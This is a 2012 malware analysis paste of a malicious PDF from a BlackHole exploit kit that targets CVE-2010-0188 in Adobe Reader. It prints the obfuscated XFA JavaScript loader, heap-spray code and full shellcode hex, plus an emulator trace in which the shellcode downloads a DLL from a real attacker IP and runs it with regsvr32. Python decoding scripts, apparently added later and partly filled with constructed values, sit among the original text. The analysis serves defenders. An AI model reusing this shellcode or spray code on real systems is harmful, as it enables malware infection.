unixfreaxjp

#Malware Analysis - BlackHole PDF CVE-2010-0188 Infector

Apr 28th, 2012
I was supposed to paste this report into the VT comments, but for some reason I couldn't paste it properly, so I put it here. Please refer to the VT analysis URL below for this analysis.
https://www.virustotal.com/file/f3836e899f2cef2338a31be6dae936f0e9ef53f43d677daacfd0e032b3a27253/analysis/
==========================
Description:
==========================
[code] This is the malicious PDF used by an exploit pack (strongly suspected to be Blackhole) for dropping the malware.
The malicious part of this PDF is obfuscated JavaScript that exploits CVE-2010-0188 and executes shellcode to download and run the malware downloader trojan. [/code]
==========================
Sample was found here:
==========================
[code] --22:30:52-- hxxp://188.127.249.241/content/ap2.php?f=696
=> 'ap2.php@f=696'
Connecting to 188.127.249.241:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24,792 (24K) (application/pdf)
100%(====================================>) 24,792 25.49K/s
22:30:54 (25.47 KB/s) - 'ap2.php@f=696' saved (24792/24792) [/code]
*) PLEASE NOTE THE PATTERN OF THE URL MARKED ABOVE FOR FURTHER INFECTION INVESTIGATION
==========================
The Malware Code:
==========================
*) the malware code is located as an object in the obfuscated JavaScript below:
[code] <h:xdp xmlns:h="http://ns.adobe.com/xdp/">
<asd/>as<config xmlns='123'><asd/>
<h:present>
<pdf>
<h:interactive>1</h:interactive>
<asd/>a<h:version>1.5</h:version>
a<asd/>
</pdf>
</h:present>
<asd/></config><asd/>
<template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
<asd/>
a<subform name="a1"> <pageSet>
<pageArea id="roteYom" name="roteYom">
<contentArea h="512pt" w="214pt" x="0.25in" y="0.25in"/>
<medium long="792pt" short="612pt" stock="default"/>
</pageArea>
</pageSet>
<subform name='asdvsa'><field name='qwe123b'><event activity='initialize'>
<h:script contentType='application/x-javascript'>

if(this)ar=[-4,

-3,

-2,
:
(continued for 6,000 lines)
:

21,

22,

5];

function test3(){if (s)v=ar[z];s=s&#43;cc[v+4]&#59;}
cc={q:"var pding;b,cefhots_x=w&#65;y()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q&#59;
qq=&#39;ghej4vabl'&#59;
q=qq[2]+qq[5]+qq[6];
q=&#113;+qq[8];
b= {v:{q:{x:this}}}.v.q.x&#59;
w= {v:b[q]}.v&#59;
s=Array()&#59;
n={v:cc}.v;
for(i=0;i-3790<0&#59;i++){
z=i&#59;
test3()&#59;
}
w(s);

</h:script>a
</event><ui>
<imageEdit/>
</ui>
</field>
</subform>
</subform></template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
<xfa:data><a1 test="123">
</a1>
</xfa:data>
</xfa:datasets>
</h:xdp> [/code]
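The first stage above never names eval directly: it spells the name out of qq, looks it up on this, and reads the second stage out of the cc character table through the ar index array. The script below is an added Python re-implementation of that loader (not code from the sample or from the original analysis): it decodes the XML character references the way the PDF's XML parser would and replays both steps. The nine ar entries after -4,-3,-2 are constructed here to complete the first statement, because the page elides the middle of the array.

```python
import html

# Pieces of the first-stage loader copied from the XFA script above. The XML
# character references (&#65; and friends) are kept as they appear in the
# sample; the PDF's XML parser decodes them before the JavaScript engine runs.
CC_TABLE_RAW = ("var pding;b,cefhots_x=w&#65;y()l1'420657839u{.VS'<+I}*/DkR%-W[]"
                "mCj^?:LBKQYEUqFM")
QQ_RAW = "&#39;ghej4vabl'"

# ar[] as printed on the page: -4,-3,-2 ... 21,22,5. The ~3,790 entries in the
# middle are elided there, so the nine entries after -2 are constructed here
# just to complete the first statement of the second stage.
AR_HEAD = [-4, -3, -2, -1, 0, -3, 1, 1, 2, 3, 4, 5]
AR_TAIL = [21, 22, 5]


def xml_decode(text):
    """Undo the &#NN; character references the loader hides characters behind."""
    return html.unescape(text)


def build_eval_name(qq):
    """Reproduce q=qq[2]+qq[5]+qq[6]; q=q+qq[8] (the second 'q' is &#113;)."""
    q = qq[2] + qq[5] + qq[6]
    return q + qq[8]          # the name the loader then looks up as this[q]


def decode_stage(cc, ar):
    """Emulate test3() run in the loop: s += cc[v + 4] for every v in ar."""
    return "".join(cc[v + 4] for v in ar)


def recover_loader():
    """Return (name looked up on this, decoded head of stage 2, decoded tail)."""
    cc = xml_decode(CC_TABLE_RAW)
    qq = xml_decode(QQ_RAW).strip("'")
    return build_eval_name(qq), decode_stage(cc, AR_HEAD), decode_stage(cc, AR_TAIL)


if __name__ == "__main__":
    name, head, tail = recover_loader()
    print(f"w = this['{name}']")   # 'eval' never appears literally in the sample
    print(repr(head), "...", repr(tail))
```

The tail [21, 22, 5] decodes to the final "();" call, and the head reproduces "var padding;", the first line of the deobfuscated code the report shows further down.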

Deobfuscating the obfuscated JavaScript above reveals an eval with the shellcode values below:
[code] var _l1 = '
4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
663d36393626653d340000';
var _l2 = '
4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
663d36393626653d340000'; [/code]

Complete deobfs will be something like this:
[code]
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '...'; // the _l1 hex string listed above
var _l2 = '...'; // the _l2 hex string listed above
//_l3 = app;
_l4 = new Array();
function _l5()
{
var _l6 = _l3.viewerVersion.toString();
_l6 = _l6.replace('.', '');
while (_l6.length < 4)_l6 += '0';
return parseInt(_l6, 10)
}
function _l7(_l8, _l9)
{
while (_l8.length * 2 < _l9)_l8 += _l8;
return _l8.substring(0, _l9/2)
}
function _I0(_I1)
{
_I1=unescape(_I1);
roteDak=_I1.length*2;
dakRote=unescape('%u9090');
spray=_l7(dakRote,0x2000-roteDak);
loxWhee=_I1+spray;
loxWhee=_l7(loxWhee,524098);
for(i=0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;
}
function _I2(_I1,len)
{
while(_I1.length<len)_I1+=_I1;
return _I1.substring(0,len)
}
function _I3(_I1)
{
ret='';
for(i=0;i<_I1.length;i+=2)
{
b=_I1.substr(i,2);
c=parseInt(b,16);
ret+=String.fromCharCode(c);
}
return ret
}
function _ji1(_I1,_I4)
{
_I5='';
for(_I6=0;_I6<_I1.length;_I6++)
{
_l9=_I4.length;
_I7=_I1.charCodeAt(_I6);
_I8=_I4.charCodeAt(_I6%_l9);
_I5+=String.fromCharCode(_I7^_I8);
}
return _I5
}
function _I9(_I6)
{
_j0=_I6.toString(16);
_j1=_j0.length;
_I5=(_j1%2)?'0'+_j0:_j0;
return _I5
}
function _j2(_I1)
{
_I5='';
for(_I6=0;_I6<_I1.length;_I6+=2)
{
_I5+='%u';
_I5+=_I9(_I1.charCodeAt(_I6+1));
_I5+=_I9(_I1.charCodeAt(_I6))
}
return _I5
}
function _j3()
{
_j4=_l5();
_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
// or:
// _j5='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
_j6=_l1;
_j7=_I3(_j6)} [/code]
*) The above strings are similar to those in the exploit at http://downloads.securityfocus.com/vulnerabilities/exploits/38195.py, which feeds a crafted TIFF image to Adobe Reader.

The shellcode (var _l1 and _l2) itself uses urlmon.dll and kernel32.dll, as reversed below:
strings:
[code] 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
663d36393626653d340000'; [/code]
==========================
If you see it in ASCII it will be like this:
==========================
[code] L.'....J<.'..c.J...J0..Jn/.JAAAA&................9.Jd.'.....AAAA
AAAAf......u4._3.d.@0.@..p.V.v.3.f.^<.t3,........@0.F9.u..4$..uQ
..LQV.u<.t5x..V.v...3.IA....3....8.t......@..;.u.^.^$..f..K.F..T
$...........^Y..S..h..}.3t.....h...j.Y............XPj@h....P...P
U...^......hon..hurlmT........a......r.......\$...$regs.D$.vr32.
D$..-s.Sh.....V...3.Q.D..wpbt.D...dll.D...Y...0.D..AQj.j.SWj..V.
..u.j.S.V.j....S.V........G.?.u.G.?.u.j.j..V.......N.......o..3.
.[..Fy6./phXXp://188.127.249.241/content/w.php?f=696&e=4.. [/code]
*) You'll see the download URL of the trojan downloader up there.
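The ASCII view above is what a plain strings pass over the decoded shellcode shows. This added Python example (not part of the original report) takes the tail of the _l1 hex string as printed above, converts it to bytes the way _I3() does, and pulls out the printable runs and the download URL, so the IoC can be recovered statically without executing anything.

```python
import re

# Tail of the _l1 shellcode string from the page: the part that carries the
# library name, the regsvr32 command fragments and the download URL.
SHELLCODE_HEX = (
    "8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e"
    "00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404"
    "76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d"
    "0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3"
    "0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b"
    "1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f"
    "663d36393626653d340000"
)

PRINTABLE = set(range(0x20, 0x7f))   # printable ASCII, space through '~'


def hex_to_bytes(hexstr):
    """Turn the JavaScript hex string into raw shellcode bytes (what _I3() does)."""
    return bytes.fromhex(hexstr)


def printable_strings(data, min_len=4):
    """The classic `strings` pass: runs of printable ASCII at least min_len long."""
    found, run = [], bytearray()
    for b in data + b"\x00":          # trailing NUL sentinel flushes the last run
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found


def extract_urls(data):
    """Pull http(s) URLs straight out of the bytes; the NUL terminator ends them."""
    return [m.decode("ascii") for m in re.findall(rb"https?://[\x21-\x7e]+", data)]


def analyse(hexstr):
    data = hex_to_bytes(hexstr)
    return {"strings": printable_strings(data), "urls": extract_urls(data)}


if __name__ == "__main__":
    result = analyse(SHELLCODE_HEX)
    for s in result["strings"]:
        print(repr(s))                 # 'hurlmT', '$regs', 'vr32', ' -s Sh', 'wpbt', '.dll', ...
    print("download URL(s):", result["urls"])
```

The fragments come out in the order the shellcode pushes or stores them ("urlm"+"on", "regs"+"vr32", " -s ", "wpbt"+".dll"), which is why the strings view above reads piecemeal while the emulator trace below shows the assembled command line.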
==========================
Reversing the shellcode gives the following API call sequence:
==========================
[code]
0x7c801ad9|kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
0x7c801d7b|kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa|kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])|
0x1a494bbe|urlmon.URLDownloadToFileA(pCaller=0, szURL=http://188.127.249.241/content/w.php?f=696&e=4, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)|0
0x7c86250d|kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)|
0x7c86250d|kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)|
0x7c81cb3b|kernel32.TerminateThread(dwExitCode=0) [/code]
==========================
What does it mean?
==========================
It means the shellcode downloads from the marked URL, saves the file locally as wpbt0.dll and silently executes it through regsvr32 -s as a process, for the infection. If you try to download the trojan, it isn't there anymore; it must have been cleaned up. I guess this PDF infector was still on the server during the cleanup.
==========================
Proof:
==========================
[code] $ curl "http://188.127.249.241/content/w.php?f=696&e=4"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /content/w.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2 Server at 188.127.249.241 Port 80</address>
</body></html> [/code]
------
ZeroDay Japan http://0day.jp
OPERATION CLEANUP JAPAN | #OCJP
Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com